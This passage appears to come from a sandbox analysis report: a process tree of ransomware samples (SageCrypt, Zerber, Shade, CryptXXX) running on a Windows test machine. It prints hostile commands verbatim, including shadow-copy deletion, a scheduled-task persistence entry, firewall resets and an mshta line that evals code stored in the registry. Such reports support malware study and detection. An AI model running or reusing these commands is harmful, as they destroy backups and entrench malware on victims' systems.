                                                                                                                                                                                                                    PID:48964
                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                      52⤵
                                                                                                                                                                                                                        PID:5424
                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                          53⤵
                                                                                                                                                                                                                            PID:39400
                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                              54⤵
                                                                                                                                                                                                                                PID:39488
                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                  55⤵
                                                                                                                                                                                                                                    PID:37676
                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                      56⤵
                                                                                                                                                                                                                                        PID:36284
                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                          57⤵
                                                                                                                                                                                                                                            PID:7952
                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                              58⤵
                                                                                                                                                                                                                                                PID:7792
                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                  59⤵
                                                                                                                                                                                                                                                    PID:1540
                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                      60⤵
                                                                                                                                                                                                                                                        PID:29744
                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                          61⤵
                                                                                                                                                                                                                                                            PID:2148
                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                              62⤵
                                                                                                                                                                                                                                                                PID:24828
                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                  63⤵
                                                                                                                                                                                                                                                                    PID:22212
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                      64⤵
                                                                                                                                                                                                                                                                        PID:19760
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                          65⤵
                                                                                                                                                                                                                                                                            PID:15652
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                              66⤵
                                                                                                                                                                                                                                                                                PID:5108
                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                                  67⤵
                                                                                                                                                                                                                                                                                    PID:41012
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                                      68⤵
                                                                                                                                                                                                                                                                                        PID:28088
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                                          69⤵
                                                                                                                                                                                                                                                                                            PID:17932
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                                              70⤵
                                                                                                                                                                                                                                                                                                PID:52164
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                                                  71⤵
                                                                                                                                                                                                                                                                                                    PID:13364
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                                                      72⤵
                                                                                                                                                                                                                                                                                                        PID:11904
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                                                          73⤵
                                                                                                                                                                                                                                                                                                            PID:51376
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g
                                                                                                                                                                                                                                                                                                              74⤵
                                                                                                                                                                                                                                                                                                                PID:49164
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                                                                                                                                                                                                                                74⤵
                                                                                                                                                                                                                                                                                                                • DcRat
                                                                                                                                                                                                                                                                                                                • Luminosity
                                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                PID:47384
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                74⤵
                                                                                                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                PID:40588
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                74⤵
                                                                                                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                PID:10736
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe
                                                                                                                                                                  Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  • Suspicious use of UnmapMainImage
                                                                                                                                                                  PID:1480
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dpqs-bc856cfae44077f57b48b11285e922b4130a6479dfed1f43f89f2fc5b2ede094.exe
                                                                                                                                                                  Trojan-Ransom.Win32.Zerber.dpqs-bc856cfae44077f57b48b11285e922b4130a6479dfed1f43f89f2fc5b2ede094.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:1608
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 208
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:40460
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe
                                                                                                                                                                  Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:1016
                                                                                                                                                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe
                                                                                                                                                                    Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:35460
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dwth-4a8a428ddc4db3aef5e7cb1893782787a0bef5dff708f2ef670ac29e1d83eb82.exe
                                                                                                                                                                  Trojan-Ransom.Win32.Zerber.dwth-4a8a428ddc4db3aef5e7cb1893782787a0bef5dff708f2ef670ac29e1d83eb82.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                  PID:1588
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe
                                                                                                                                                                  Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:2300
                                                                                                                                                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe
                                                                                                                                                                    Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:27600
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.gdcf-7f2335466ecca7be6888f92b5ba260780ce0a38039ceb54ac99b0485b3b086de.exe
                                                                                                                                                                  Trojan-Ransom.Win32.Zerber.gdcf-7f2335466ecca7be6888f92b5ba260780ce0a38039ceb54ac99b0485b3b086de.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                  PID:1616
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 136
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:51672
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe
                                                                                                                                                                  Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                  PID:1836
                                                                                                                                                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe
                                                                                                                                                                    Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:40984
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe
                                                                                                                                                                  Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                  PID:700
                                                                                                                                                                  • C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe
                                                                                                                                                                    Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:41416
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe
                                                                                                                                                                  UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                  PID:796
                                                                                                                                                                  • C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe
                                                                                                                                                                    UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:41088
                                                                                                                                                                • C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.Win32.CryptXXX.sb-3d0af672ee06451fe1a7c9a27c8f36f4ec492ea1196210425d24199456626022.exe
                                                                                                                                                                  UDS-Trojan-Ransom.Win32.CryptXXX.sb-3d0af672ee06451fe1a7c9a27c8f36f4ec492ea1196210425d24199456626022.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                  PID:968
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ebicabfbdfbcg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ebicabfbdfbcg.exe 7/7/8/0/6/2/6/0/2/3/5 KElBRDc1LTAwHSpMTjpQQ0I3MB4sST5NT09MSUNEOy0bKD1BU05HPj0uHSo8Qjw9Kh4pUFBMP048TF9DQjcwHixOPktORUxdT1JKOmNtbWg6KS1tcnQrPz5MQy1OTUotP01LJ0JGRkkeKUNKRj5EQjw9Gi0+MTsqLBkoPDI3KysgLUEuNiYpIClCLj0rLhsoPS09Jy8aL05PSj1OO1RZTkxJVD4+UjYYL0pQSURTQE9YPk1MOzsaL05PSj1OO1RZTDtNQzobKD5QRVlTTEw7HSo+UT1fPUs+TEdLQDYZJ0hJUU5fQE9KUEw9UjczGi9SRTxHRFFPT11PUko6GyhPRT0sHilEUS44GShKVUhSQ01DXFI+RTtPR0NDTT9EQE5LRD0aLUNTXU9QR01BTT87bnJzYhsoSz1UT1BISUxEWk5MPVJZQjtZUTotGShAST5DUj0vHSpCTFdEU0w7TUdAWj5HO1JTTk5FQjphWmVrZRotPk9VS0dIOjxfQ043Mi41KSoqKC4zMSgxMC8bKE1BTT87KzQwNi4yLys0Mh4pRE1USUVIOURZUkNNQzovKCowLywuKzUoLiszLCo6LDYkUEsdKk46NVBzcmJvbCpwa2VkaVwjLGYwKzIZKE1SRjtidHJtICxaHTJgIyxmZWJvKicoMSsvXmVxZmJnJ2FuYG0fMmRPcGdNYW1fQml3bGlqWl1FYWhfYWVwXF9eaWRvcyMsZi8xLTIsMTYtMyolMGNfaHBmbGlfXm1fa1xgXmolLGQrNDA2LjIvKzUqIy1mNjMxLy8sNTMwLDlWLjRuRjxFMV90US9KTlxqQUdIYltXbTFGSg==
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:22872
                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                                      wmic /output:C:\Users\Admin\AppData\Local\Temp\81732038323.txt bios get serialnumber
                                                                                                                                                                      5⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:41420
                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                                      wmic /output:C:\Users\Admin\AppData\Local\Temp\81732038323.txt bios get version
                                                                                                                                                                      5⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:3724
                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                                      wmic /output:C:\Users\Admin\AppData\Local\Temp\81732038323.txt bios get version
                                                                                                                                                                      5⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:26852
                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                                      wmic /output:C:\Users\Admin\AppData\Local\Temp\81732038323.txt bios get version
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:13548
                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                                                                        wmic /output:C:\Users\Admin\AppData\Local\Temp\81732038323.txt bios get version
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:35864
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 22872 -s 368
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:38072
                                                                                                                                                                    • C:\Users\Admin\Desktop\00288\UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe
                                                                                                                                                                      UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Drops startup file
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                      PID:1548
                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                        C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                        PID:9456
                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                        C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                        PID:4860
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:2980
                                                                                                                                                                    • C:\Windows\syswow64\svchost.exe
                                                                                                                                                                      "C:\Windows\syswow64\svchost.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • DcRat
                                                                                                                                                                      • Modifies WinLogon for persistence
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:16040
                                                                                                                                                                    • C:\Windows\syswow64\svchost.exe
                                                                                                                                                                      "C:\Windows\syswow64\svchost.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • DcRat
                                                                                                                                                                      • Modifies WinLogon for persistence
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:41076
                                                                                                                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Beni Oku.txt
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:27708
                                                                                                                                                                      • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                        "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:6136
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          "C:\Windows\system32\cmd.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:21540
                                                                                                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                            "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:39760
                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                              "C:\Windows\explorer.exe"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:39064
                                                                                                                                                                              • C:\Windows\System32\taskmgr.exe
                                                                                                                                                                                "C:\Windows\System32\taskmgr.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:23640
                                                                                                                                                                                • C:\Windows\System32\taskmgr.exe
                                                                                                                                                                                  "C:\Windows\System32\taskmgr.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:20372
                                                                                                                                                                                • C:\Windows\system32\mshta.exe
                                                                                                                                                                                  "C:\Windows\system32\mshta.exe" javascript:zz8k9V="ZdHerWBf";A2C4=new%20ActiveXObject("WScript.Shell");QG0Y6BIgd="z";rT2AI=A2C4.RegRead("HKCU\\software\\DrjFiX9\\Q6Y5e3W");tdG8B="V";eval(rT2AI);PF51zl="joLAHB1";
                                                                                                                                                                                  1⤵
